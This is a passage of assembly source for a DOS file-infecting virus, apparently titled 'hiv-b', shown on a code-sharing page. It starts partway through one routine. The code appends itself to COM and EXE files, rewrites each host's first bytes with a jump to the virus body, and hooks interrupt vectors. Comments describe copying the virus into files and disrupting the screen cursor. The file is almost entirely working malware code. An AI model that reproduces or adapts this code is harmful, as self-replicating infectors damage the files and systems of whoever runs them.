📄 hiv-b.asm
字号:
LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_2 PROC NEAR
MOV CX,4
MOV DI,AX
AND DI,0FH
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill
RCR AX,1 ; Rotate thru carry
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_3 PROC NEAR
MOV AH,40H
MOV CX,64EH
MOV DX,100H
CALL SUB_6
JMP SHORT LOC_24
DB 90H
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_4:
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =
PUSH AX
CMP BYTE PTR [SI],0E9H
JNE LOC_21 ; Jump if not equal
SUB AX,651H
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag
RETN
LOC_21:
CALL SUB_3
JNC LOC_22 ; Jump if carry=0
POP AX
RETN
LOC_22:
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX
SUB AX,3
MOV DX,122H
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H
MOV CS:[SI+1],AX
MOV AH,40H
MOV CX,3
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags
CALL CS:DATA_28
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
MOV CS:DATA_29,AX ; to the COM File...
MOV CS:DATA_30,ES
MOV AX,46AH
MOV DS:DATA_5E,AX
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
MOV CS:DATA_32,AX ; get your info needed on
MOV CS:DATA_33,ES ; System...
LES AX,CS:DATA_31
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore regesters!
POP DS ; go back to the file
POP AX ; being executed...
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
MOV DS:DATA_5E,AX ; yourself to the EXE
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
DB 0B0H, 3, 0CFH, 50H, 53H, 51H
DB 52H, 56H, 57H, 55H, 1EH, 6
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH
DB 62H, 4, 0A1H, 50H, 4, 2EH
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
DB 4, 0A3H, 50H, 4, 2EH, 0A1H
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H
DB 34H, 0, 0E8H, 0B7H, 0, 2EH
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4
DB 0B3H, 2, 0B8H, 2, 9, 0B9H
DB 1, 0, 0CDH, 10H, 2EH, 0A1H
DB 0CEH, 4, 0A3H, 50H, 4, 7
DB 1FH
DB ']_^ZY[X.'
DB 0FFH, 2EH, 0CAH, 4
DATA_36 DW 0
DATA_37 DW 1010H
DATA_39 DB 0
DATA_40 DD 706A0000H
DB 0, 0, 2EH, 0A1H, 0C7H, 4
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH
DB 0F6H, 6, 0C9H, 4, 1, 74H
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH
DB 80H, 36H, 0C9H, 4, 1, 0EBH
DB 0AH
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if >
XOR CS:DATA_39,1
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero
CMP AH,18H
JB LOC_28 ; Jump if below
XOR CS:DATA_39,2
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if >
XOR CS:DATA_39,2
LOC_28:
CMP BYTE PTR CS:DATA_36,20H
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; Get info on type of Video
MOV BH,DS:DATA_13E ; Display the system has...
MOV AH,8
INT 10H ; with ah=functn 08h
; basically fuck the cursur..
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -